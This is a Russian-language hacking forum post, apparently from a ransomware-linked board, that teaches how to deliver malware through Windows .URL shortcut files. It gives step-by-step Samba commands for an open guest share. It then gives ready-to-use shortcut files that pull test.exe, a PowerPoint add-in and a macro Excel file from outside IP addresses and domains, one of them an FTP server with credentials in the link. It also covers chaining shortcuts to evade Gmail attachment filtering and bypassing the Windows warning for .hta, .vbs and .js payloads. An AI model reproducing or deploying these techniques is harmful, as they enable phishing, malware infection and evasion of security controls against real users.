• [ Регистрация ]Открытая и бесплатная
  • Tg admin@ALPHV_Admin (обязательно подтверждение в ЛС форума)

Статья Злонамеренные файлы .URL + Обход алерта

admin

#root
Администратор
Регистрация
20.01.2011
Сообщения
7,665
Розыгрыши
0
Реакции
135
Всем п/т первое что Вам надо, это найти шару, бегом сюда Для просмотра ссылки Войди или Зарегистрируйся или Для просмотра ссылки Войди или Зарегистрируйся (Всего результатов 16 112)
smile.png




SMB шара без пароля на Ubuntu:

1. Берем дед на линуксе например Ubuntu
2. Ставим Samba

Код:
sudo apt update
sudo apt install samba
Создаём папку которую будем раздавать
Код:
mkdir /home/dir05
Выдадим полные права
Код:
chmod -R 777 /home/dir05
Настроим самбу
Код:
sudo nano /etc/samba/smb.conf
Впишем это
Код:
[global]
map to guest = Bad User
[private]
path = /home/dir05
guest ok = yes
read only = no

тут

private - имя папки которую видит юзер при заходе в шару, может быть любым по вкусу

home/dir05 - вы уже знаете

read only - потом можно будет включить чтобы туда никто ничего не писал и оттуда не удалял

Сохраняем настройки Ctrl-O и выходим Ctrl-X

Теперь осталось перезагрузить сервис чтобы изменения вступили в силу

Код:
sudo service smbd restart




Давайте посмотрим что из себя представляет сам файл ярлыка и как это делается.



Вот сам файл ярлыка;
Код:
[InternetShortcut]
IconIndex=318
HotKey=0
IDList=
URL=file://36.94.106.4\htdocs\test.exe
IconFile=C:\Windows\system32\SHELL32.dll
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9
Можно использовать: Для просмотра ссылки Войди или Зарегистрируйся
Код:
[InternetShortcut]
IDList=
HotKey=0
URL=ms-powerpoint:ofe|u|http://diskcitylink.ru/ffDY72m/test.ppa
Можно использовать: Office Url protocol + ftp://
Код:
[InternetShortcut]
IconIndex=318
HotKey=0
IDList=
URL=ms-excel:ofv|u|ftp://a377376_1:1234567@a397966.ftp.mchost.ru/httpdocs/test.xlsm
IconFile=C:\Windows\system32\SHELL32.dll
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9

Видео демонстрация Internet Shortcut + Office URI scheme.



Чтобы загрузить его в gmail Вам надо два файла .URL в пером указываем на второй .URL

Код:
[InternetShortcut]
IconIndex=318
HotKey=0
IDList=
URL=file://36.94.106.4\htdocs\test.URL
IconFile=C:\Windows\system32\SHELL32.dll
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9

Первый .URL (URL=file://36.94.106.4\htdocs\test.URL)

Второй .URL (URL=file://36.94.106.4\htdocs\test.URL)

Третий .URL (URL=file://36.94.106.4\htdocs\test.ваша нагрузка)

Вот ещё пару способов как обойти загрузку Для просмотра ссылки Войди или Зарегистрируйсяи Для просмотра ссылки Войди или Зарегистрируйся в gmail.

Обходим алерт в файлах .URL



Все что вам надо, это указать на файл в архиве, да работает точно с .hta .vbs .js остальные нагрузки тестите сами.

Тут также надо учесть что SMBv1 не устанавливается по умолчанию в Windows 10 версии 1709, Windows Server версии 1709 и более поздних версиях ведра.

[/QUOTE]
 
Activity
So far there's no one here
Сверху Снизу